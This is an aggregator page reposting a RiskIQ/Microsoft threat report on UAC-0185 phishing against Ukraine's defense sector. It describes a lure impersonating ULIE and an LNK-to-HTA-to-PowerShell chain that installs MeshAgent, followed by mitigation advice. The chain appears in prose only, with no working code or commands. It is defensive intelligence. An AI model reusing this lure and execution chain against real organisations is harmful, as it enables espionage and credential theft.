One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8622342 |
| Date de publication | 2024-12-09 15:40:00 (vue: 2024-12-09 16:08:36) |
| Titre | Targeted cyberattacks UAC-0185 against the Defense Forces and enterprises of the defense industry of Ukraine |
| Texte | #### Targeted Geolocations - Ukraine ## Snapshot Ukrainian authorities have uncovered a cyber campaign by UAC-0185 (UNC4221), targeting Ukrainian defense and industrial sectors with malicious emails impersonating the Ukrainian Union of Industrialists and Entrepreneurs (ULIE). The campaign leverages phishing emails containing malicious hyperlinks that lead to the deployment of the remote management tool MeshAgent, aiming to steal credentials and establish unauthorized access to military and enterprise systems. ## Description On December 4, 2024, the Computer Emergency Response Team of Ukraine (CERT-UA) received reports of phishing emails sent under the guise of ULIE, promoting a conference on transitioning Ukrainian defense industry products to NATO technical standards. These emails contained a hyperlink that, when clicked, downloaded a malicious LNK file, which executed an HTA file through mshta.exe. The HTA file utilized PowerShell commands to download and execute additional files, including a ZIP archive with three components: a batch file (Main.bat), another HTA file (Registry.hta), and an executable (update.exe). This sequence culminated in the execution of "update.exe," identified as MESHAGENT, a remote management tool. ## Microsoft Analysis and Additional OSINT Context The abuse of remote monitoring and management (RMM) tools by both cybercriminals and nation-state actors represents a significant and growing threat. MeshAgent is an open-source [remote management tool](https://sip.security.microsoft.com/intel-explorer/articles/9782a9ef) that has been exploited by various threat actors to gain unauthorized access to victims\' computers. It can gather essential system information for remote management and offers features like power and account management, chat or message pop-ups, file transfer, and command execution. Additionally, it supports web-based remote desktop capabilities such as RDP and VNC. While users can utilize this tool for legitimate remote system management, these features are also highly attractive to malicious actors. For example, in August, [CERT-UA reported](https://sip.security.microsoft.com/intel-explorer/articles/560ec243) on a mass phishing campaign that led to the delivery of AnonVNC malware, which is derived from MeshAgent. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Review our technique profile on [abuse of remote monitoring and management tools](https://sip.security.microsoft.com/intel-explorer/articles/9782a9ef) for blocking and hunting for tools like MeshAgent. - Pilot and deploy [phishing-resistant authentication methods for users.](https://learn.microsoft.com/en-us/entra/identity/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) - Configure Microsoft Defender for Office 365 to [recheck links on click.](https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=magicti_ta_learndoc) Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular [anti-spam](https://learn.microsoft.com/en-us/defender-office-365/anti-spam-protection-about?ocid=magicti_ta_learndoc) and [anti-malware](https://learn.microsoft.com/en-us/defender-office-365/anti-malware-protection-about?ocid=magicti_ta_learndoc) protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks. - Encourage users to use Microsoft Edge and other web browsers that support [Microsoft Defender SmartScreen](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-security-smartscreen?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, sca |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 0185 2024 2024** 365 365/anti 365/safe about abuse access accessed accessing account action activity actors addition additional additionally against age aiming alert alerts all allow also analysis anonvnc another anti antivirus any applications apps archive are artifacts associated attack attacks attractive august authentication authorities automated based bat batch been behind block blocking blocks both breach breaches browsers campaign can capabilities cards cert chat click clicked cloud com/en com/intel command commands common components: computer computers conference configure contained containing content context copyright cover credentials criterion culminated customers cyber cyberattacks cybercriminals december defender defense delivered delivery deployment deploy derived description desktop detect detected detection detections/hunting distribution does domains download downloaded edge edr email emails emergency enable encourage endpoint endpoint/attack endpoint/automated endpoint/cloud endpoint/detect endpoint/edr endpoint/enable enterprise enterprises entrepreneurs eop equivalent essential establish even evolving example exchange exe executable execute executed execution exploited explorer/articles/560ec243 explorer/articles/9782a9ef features file files flow following forces from full gain gather geolocations gov government growing guise has have help highly host however hta https://cert https://learn https://sip hunting hyperlink hyperlinks identified identifies immediate impact impersonating inbound including indicate industrial industrialists industry information internet investigation investigations lead learndoc learndoc#block learning led legitimate leverages like links list lnk locations machine mail main majority malicious malware management mass meet meshagent message messages methods microsoft military mitigations mode monitored monitoring mshta nation nato network new non not obfuscated occurs ocid=magicti offers office online on open organization osint other part passive permission phishing pilot pop post potentially power powershell prevalence prevent product products profile prohibited promoting protect protection protections provided provides pua queries rapidly rdp received recheck recommendations recommends reduce reducing reduction reference references registry regular remediate remediation remote report reported reports represents reproduction reserved resistant resolve response review rewriting rights rmm rules running run safe scam scanning scenes scripts sectors security sent sequence sharepoint significant significantly site sites smartscreen snapshot software source spam standards state status steal such supports support surface suspicious system systems take targeted targeting team teams technical technique techniques techniques: thereof these threat three through time tool tools to transfer transitioning triggered trusted turn ua/article/6281632 uac ukraine ukrainian ulie unauthorized unc4221 uncovered under union unknown unless unrelated unwanted update ups url urls us/defender us/deployedge/microsoft us/entra/identity/authentication/concept usage use used users utilize utilized variants various verification victims vnc volume web websites when which without works written xdr your zip and for in protection safe that this to |
| Tags | Malware Tool Threat Industrial Conference Technical |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.